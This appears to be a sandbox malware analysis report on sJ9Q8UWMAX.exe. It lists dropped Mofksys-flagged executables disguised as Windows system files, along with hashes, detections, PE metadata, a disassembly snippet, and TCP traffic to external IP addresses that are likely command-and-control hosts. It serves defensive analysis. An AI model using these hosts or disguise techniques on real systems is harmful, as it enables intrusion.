                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YGURIJQPDD9BXO5FWFYW.temp

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3252
                                                                                                                                                                                Entropy (8bit):3.3415004321854416
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:xEhJtJJ88vNdLwd+oyNEhJtJJ89aNdLwd/yH:xMJlrkdaMJlxkdy
                                                                                                                                                                                MD5:7B50062F2C00880F8CCCA5844C01F5F0
                                                                                                                                                                                SHA1:B5DDADFFF043EE502FF6FCD97CC3E0AC897D0439
                                                                                                                                                                                SHA-256:A71ECB1F3B9B08C790125030D0A619B478708F2C130CA846283E07195FDED34A
                                                                                                                                                                                SHA-512:9A4EDEFFCF7FA53A0DF9F7F34D472364CE1E9518381CCE1857D73DF52A13EBC45C5B50D02FA92828D651B1B0AE3F36B5889F85EC823FDA0C5DE16E85B16961F0
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:...................................FL..................F.@..&......].......i......]......:..........................P.O. .:i.....+00.:...:..,.LB.)...A&...&..........-.....]......c......l.2...:..T.7&.SJ9Q8U~2.EXE..P.......T.7.T.7..........................'...s.j.9.q.8.u.w.m.a.x...e.x.e.........V...............-.......U............ r......C:\Users\user\Desktop\sj9q8uwmax.exe.....O.p.e.n. .a. .n.e.w. .A.n.y.D.e.s.k. .w.i.n.d.o.w...'.c.:.\.u.s.e.r.s.\.a.l.f.o.n.s.\.d.e.s.k.t.o.p.\.s.j.9.q.8.u.w.m.a.x...e.x.e...........%USERPROFILE%\desktop\sj9q8uwmax.exe................................................................................................................................................................................................................................%.U.S.E.R.P.R.O.F.I.L.E.%.\.d.e.s.k.t.o.p.\.s.j.9.q.8.u.w.m.a.x...e.x.e...........................................................................................................................................

                                                                                                                                                                                C:\Users\user\Desktop\sj9q8uwmax.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\sJ9Q8UWMAX.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3848888
                                                                                                                                                                                Entropy (8bit):7.999092263566694
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:98304:bJ9toRH4BY81fY8i2k5x2Vy5nkvusNFl0K9xdo:bfee2Gtu/GusNf0ax6
                                                                                                                                                                                MD5:871EB4B8AEFAEA1113DD3F08B7CB535C
                                                                                                                                                                                SHA1:441A52F0112DA187244EEEC5B24A79F40CC17D47
                                                                                                                                                                                SHA-256:AEA8F85E569443A8C00B94FA19B5155B9122183F05BEDFDCDCCD1D18451760FD
                                                                                                                                                                                SHA-512:64E81E1F4975F8F4571EDAED80ACCE93A06ABE4FEEE2858DAFE9F0275EDD4734D12C6B7987EB3B9CCA84C3E071B0423656A4C8568B9BAFD48E3CFADF2DBC5277
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........h.}.;.}.;.}.;..";.}.;..#;.}.;...;.}.;...;.}.;Rich.}.;........................PE..L...=qab.........."......*...P:..H...........@....@.................................do;...@.............................................PH...........z:..@...........................................................................................text...5(.......*.................. ..`.itext...H...@...........................rdata..............................@..@.data.....9.......9..2..............@....rsrc...PH.......J...,:.............@..@.reloc...............v:.............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Windows\Resources\Themes\explorer.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                                                File Type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):138466
                                                                                                                                                                                Entropy (8bit):5.873431225585432
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:UfsEqouTRcG/Mzvgf7xEuvnXNTRdUzwTekUOisZ1yDDajtXbVAd:UVqoCl/YgjxEufVU0TbTyDDalyd
                                                                                                                                                                                MD5:DD8285E811872E2562A43A04A7B27672
                                                                                                                                                                                SHA1:7AD1EC878AC466E1D148565826917FCD172580F0
                                                                                                                                                                                SHA-256:BCE99678E04087DE5DC3318BE25D57DAD8DD36201AAF4E77D29CD4E62688132A
                                                                                                                                                                                SHA-512:069F89E85C5040C752853D7F1CE3C9C65F8B8FE4BFABCB67C508E47DFEB59C98F64A31AF195C297700E177AC8353898678B980D89D71C08C283FCCBD2DBF1EBE
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\explorer.exe, Author: Joe Security
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0.......)............@..................................E..........................................(...........................................................................(... ....... ............................text.............................. ....data...............................@....rsrc............ ................5.@...l.[J............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Windows\Resources\Themes\icsys.icn.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\sJ9Q8UWMAX.exe
                                                                                                                                                                                File Type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):138316
                                                                                                                                                                                Entropy (8bit):5.843351150845176
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:UfsEqouTRcG/Mzvgf7xEuvnXNTRdUzwTekUOisZ1yDDajtXbVAk:UVqoCl/YgjxEufVU0TbTyDDalyk
                                                                                                                                                                                MD5:0A9BDF90EF50DEF16C6D4C363D0F0B9C
                                                                                                                                                                                SHA1:5C8AB92BE20C90234637A769EEDBD59122122301
                                                                                                                                                                                SHA-256:787E7D379518A641E58FF1A2A67C6A0818DF1C74A5DEE7119C0490B385036062
                                                                                                                                                                                SHA-512:05B09265C156042164112E2397B7A4F0632DF5DAB5BF2C590553CF2185A629F39E9C8BD6A733037343043E36B6414DCB9E3C1B80EB7812A9DE62D8D11269F0C9
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\icsys.icn.exe, Author: Joe Security
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0.......)............@..................................E..........................................(...........................................................................(... ....... ............................text.............................. ....data...............................@....rsrc............ ................5.@...l.[J............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Windows\Resources\spoolsv.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                File Type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):138457
                                                                                                                                                                                Entropy (8bit):5.85413891591597
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:UVqoCl/YgjxEufVU0TbTyDDalyErrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1:UsLqdufVUNDa3
                                                                                                                                                                                MD5:A97B2BA7591F981B8BBB1CE5E78C8D3A
                                                                                                                                                                                SHA1:A00E269BEDB2739229BB8C8F7FDDABDC90B45EF1
                                                                                                                                                                                SHA-256:D79C26844019590857DA0AD87864ECCBF407300F110F5333010838364B9E0B20
                                                                                                                                                                                SHA-512:65013B28C14AF529538438D4BE8D218040A47315DB8242B7121C694D4ABDBA5E0B52017D1543FA0A950004722BBBBD2E2C096E08162269468BE62F058DF05946
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\spoolsv.exe, Author: Joe Security
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0.......)............@..................................E..........................................(...........................................................................(... ....... ............................text.............................. ....data...............................@....rsrc............ ................5.@...l.[J............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Windows\Resources\svchost.exe

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                                                File Type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):138302
                                                                                                                                                                                Entropy (8bit):5.871623753685915
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:UfsEqouTRcG/Mzvgf7xEuvnXNTRdUzwTekUOisZ1yDDajtXbVA2:UVqoCl/YgjxEufVU0TbTyDDaly2
                                                                                                                                                                                MD5:E2A51AD55E5850D878E994E774D44ED1
                                                                                                                                                                                SHA1:14DD6DFB61304BF2F3618259C99BE6BCCA507724
                                                                                                                                                                                SHA-256:94D947A14E722D6E9CDE5C222438C0BD0A95115B41227369C6B96930A03A1849
                                                                                                                                                                                SHA-512:617D757DF5AC2C45C9D7052B3DEAD381D3E869C07A6A889D69BA98950663C31BAC88C16005F36270F5500BA769BAAD45FDF3463D06FD9A74F34C528597FB6E18
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\svchost.exe, Author: Joe Security
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0.......)............@..................................E..........................................(...........................................................................(... ....... ............................text.............................. ....data...............................@....rsrc............ ................5.@...l.[J............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):55
                                                                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                Static File Info

                                                                                                                                                                                General

                                                                                                                                                                                File type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                Entropy (8bit):7.983266251122014
                                                                                                                                                                                TrID:
                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                File name:sJ9Q8UWMAX.exe
                                                                                                                                                                                File size:3987229
                                                                                                                                                                                MD5:7fdb00c80f0250575a05601c08627d50
                                                                                                                                                                                SHA1:709a67ee148978a05bb3c3b530d68004c1eb5196
                                                                                                                                                                                SHA256:5d47d5ad88c5d99cac3a860e682bb9542046e05ee33b3a4fd896db5464e7f0a6
                                                                                                                                                                                SHA512:ffe615bebefcfb6460f48a64b0494787b9f2e02dd445359a6fd374bf21bba04d7e20595f9d285455f47e3f844d3ed8561cd7d29188f1d36d836a4148055aa0af
                                                                                                                                                                                SSDEEP:98304:xJ9toRH4BY81fY8i2k5x2Vy5nkvusNFl0K9xdi:xfee2Gtu/GusNf0axQ
                                                                                                                                                                                TLSH:C9063323AB94043FD81242F075B5C639B9407E710AB99D472BAAFA15A6F3B4337B411F
                                                                                                                                                                                File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0.......)............@................

                                                                                                                                                                                File Icon

                                                                                                                                                                                Icon Hash:081669d8d8299628

                                                                                                                                                                                Static PE Info

                                                                                                                                                                                General

                                                                                                                                                                                Entrypoint:0x40290c
                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                DLL Characteristics:
                                                                                                                                                                                Time Stamp:0x51593266 [Mon Apr 1 07:08:22 2013 UTC]
                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                Import Hash:8c16c795b57934183422be5f6df7d891

                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                Instruction
                                                                                                                                                                                push 00403ADCh
                                                                                                                                                                                call 00007F294CC720F3h
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                dec eax
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], dh
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax+00h], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                push edi
                                                                                                                                                                                or byte ptr [edx-3Bh], bh
                                                                                                                                                                                xchg byte ptr [edx], bl
                                                                                                                                                                                hlt
                                                                                                                                                                                inc edi
                                                                                                                                                                                test al, FBh
                                                                                                                                                                                xchg eax, esp
                                                                                                                                                                                std
                                                                                                                                                                                jp 00007F294CC720FFh
                                                                                                                                                                                xchg eax, ebx
                                                                                                                                                                                hlt
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add dword ptr [eax], eax
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                iretw
                                                                                                                                                                                adc dword ptr [edi+7250000Ch], esi
                                                                                                                                                                                outsd
                                                                                                                                                                                push 00000065h
                                                                                                                                                                                arpl word ptr [ecx+esi+00h], si
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax+00000000h], dl
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [edx], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [ecx], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [edi-5Fh], bh
                                                                                                                                                                                insb
                                                                                                                                                                                in eax, dx
                                                                                                                                                                                int3
                                                                                                                                                                                mov ah, F9h
                                                                                                                                                                                dec ebx
                                                                                                                                                                                mov ah, 26h
                                                                                                                                                                                or ebx, esi
                                                                                                                                                                                add ebx, ecx
                                                                                                                                                                                jle 00007F294CC72083h
                                                                                                                                                                                add dword ptr [eax], eax
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                mov al, byte ptr [B0000000h]
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [ecx], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [esp+esi*2+00h], ch
                                                                                                                                                                                add byte ptr [ecx], al
                                                                                                                                                                                and byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [ecx], al
                                                                                                                                                                                add byte ptr [eax], ah
                                                                                                                                                                                and byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [ebp+45h], dh
                                                                                                                                                                                js 00007F294CC72159h
                                                                                                                                                                                popad
                                                                                                                                                                                je 00007F294CC72165h
                                                                                                                                                                                push 00280000h
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                and byte ptr [eax], al
                                                                                                                                                                                inc esp
                                                                                                                                                                                into
                                                                                                                                                                                jne 00007F294CC720DDh
                                                                                                                                                                                not byte ptr [ebx+13B942C8h]
                                                                                                                                                                                push esp
                                                                                                                                                                                push ds
                                                                                                                                                                                lea ebp, dword ptr [edx-78h]
                                                                                                                                                                                insb
                                                                                                                                                                                pop ds
                                                                                                                                                                                mov bl, DAh
                                                                                                                                                                                mov ebx, 4A9AD4DAh
                                                                                                                                                                                test dword ptr [ebx], esi
                                                                                                                                                                                sbb al, 68h

                                                                                                                                                                                Data Directories

                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x198f40x28.text
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d0000x13f0.rsrc
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x10000x220.text
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                Sections

                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                .text0x10000x191d40x1a000False0.35633263221153844data5.734799312113526IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                .data0x1b0000x180c0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                .rsrc0x1d0000x13f00x2000False0.1502685546875data3.550600360706216IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                Resources

                                                                                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                                                                                RT_ICON0x1d1300xcd0dBase IV DBT of @.DBF, block length 3072, next free block index 40, next free block 4232066556, next used block 905723957
                                                                                                                                                                                RT_GROUP_ICON0x1de000x14data
                                                                                                                                                                                RT_VERSION0x1de140x1ecdataEnglishUnited States
                                                                                                                                                                                RT_MANIFEST0x1e0000x3e7XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                                                                                                Imports

                                                                                                                                                                                DLLImport
                                                                                                                                                                                MSVBVM60.DLLEVENT_SINK_GetIDsOfNames, _CIcos, _adj_fptan, __vbaStrI4, __vbaVarVargNofree, __vbaFreeVar, __vbaLenBstr, __vbaLateIdCall, __vbaPut3, __vbaEnd, __vbaFreeVarList, _adj_fdiv_m64, EVENT_SINK_Invoke, __vbaRaiseEvent, __vbaFreeObjList, __vbaStrErrVarCopy, _adj_fprem1, __vbaRecAnsiToUni, __vbaCopyBytes, __vbaStrCat, __vbaLsetFixstr, __vbaRecDestruct, __vbaSetSystemError, __vbaHresultCheckObj, __vbaNameFile, _adj_fdiv_m32, Zombie_GetTypeInfo, __vbaAryDestruct, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR4, __vbaStrFixstr, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaGet3, __vbaStrCmp, __vbaGet4, __vbaPutOwner3, __vbaAryConstruct2, __vbaVarTstEq, __vbaI2I4, DllFunctionCall, __vbaFpUI1, __vbaRedimPreserve, __vbaStrR4, _adj_fpatan, __vbaLateIdCallLd, Zombie_GetTypeInfoCount, __vbaRedim, __vbaRecUniToAnsi, EVENT_SINK_Release, __vbaNew, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaGetOwner3, __vbaUbound, __vbaFileSeek, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaAryLock, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaFpI2, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, __vbaR8IntI4, _allmul, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeObj, __vbaFreeStr

                                                                                                                                                                                Possible Origin

                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                EnglishUnited States

                                                                                                                                                                                Network Behavior

                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                TCP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Jul 16, 2022 23:57:19.587668896 CEST49768443192.168.2.5185.229.191.39
                                                                                                                                                                                Jul 16, 2022 23:57:19.587721109 CEST44349768185.229.191.39192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:19.587805033 CEST49768443192.168.2.5185.229.191.39
                                                                                                                                                                                Jul 16, 2022 23:57:19.588999033 CEST49768443192.168.2.5185.229.191.39
                                                                                                                                                                                Jul 16, 2022 23:57:19.589030027 CEST44349768185.229.191.39192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:19.653134108 CEST44349768185.229.191.39192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:19.653227091 CEST49768443192.168.2.5185.229.191.39
                                                                                                                                                                                Jul 16, 2022 23:57:19.654544115 CEST49768443192.168.2.5185.229.191.39
                                                                                                                                                                                Jul 16, 2022 23:57:19.654560089 CEST44349768185.229.191.39192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:19.654761076 CEST44349768185.229.191.39192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:19.655201912 CEST49768443192.168.2.5185.229.191.39
                                                                                                                                                                                Jul 16, 2022 23:57:19.961786032 CEST49768443192.168.2.5185.229.191.39
                                                                                                                                                                                Jul 16, 2022 23:57:19.993743896 CEST4976980192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:20.018194914 CEST804976949.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:20.018381119 CEST4976980192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:20.019409895 CEST4976980192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:20.044123888 CEST804976949.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:20.045289040 CEST804976949.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:20.045331955 CEST804976949.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:20.045465946 CEST4976980192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:20.061772108 CEST4976980192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:20.086858034 CEST804976949.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:20.086901903 CEST804976949.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:20.087076902 CEST4976980192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:20.558908939 CEST4976980192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:20.584897041 CEST804976949.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:20.630769014 CEST497716568192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:57:20.661362886 CEST65684977192.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:20.661483049 CEST497716568192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:57:20.662384033 CEST497716568192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:57:20.693418980 CEST65684977192.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:20.693470955 CEST65684977192.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:20.693557024 CEST65684977192.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:20.693645954 CEST497716568192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:57:20.713943958 CEST497716568192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:57:20.745944977 CEST65684977192.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:20.745971918 CEST65684977192.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:20.746057987 CEST497716568192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:57:21.089333057 CEST497716568192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:57:21.122070074 CEST65684977192.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:22.033885956 CEST4977580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:22.061877012 CEST8049775142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:22.062598944 CEST4977580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:22.092885971 CEST4977580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:22.120719910 CEST8049775142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:22.120779037 CEST8049775142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:22.120810986 CEST8049775142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:22.120866060 CEST4977580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:22.120892048 CEST4977580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:22.127844095 CEST4977580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:22.128345966 CEST4977580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:22.158389091 CEST8049775142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:22.158479929 CEST4977580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:24.340928078 CEST4979180192.168.2.5142.250.102.82
